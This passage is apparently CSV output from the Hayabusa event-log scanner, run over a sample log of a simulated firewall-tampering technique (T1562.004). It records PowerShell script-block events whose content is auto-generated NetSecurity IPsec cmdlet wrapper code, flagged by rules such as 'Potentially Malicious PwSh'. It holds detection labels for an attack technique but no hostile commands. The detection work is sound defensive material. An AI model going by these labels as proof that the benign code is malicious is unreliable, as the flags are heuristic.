[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolic",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,")] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolic",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,y'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine},../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,y'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 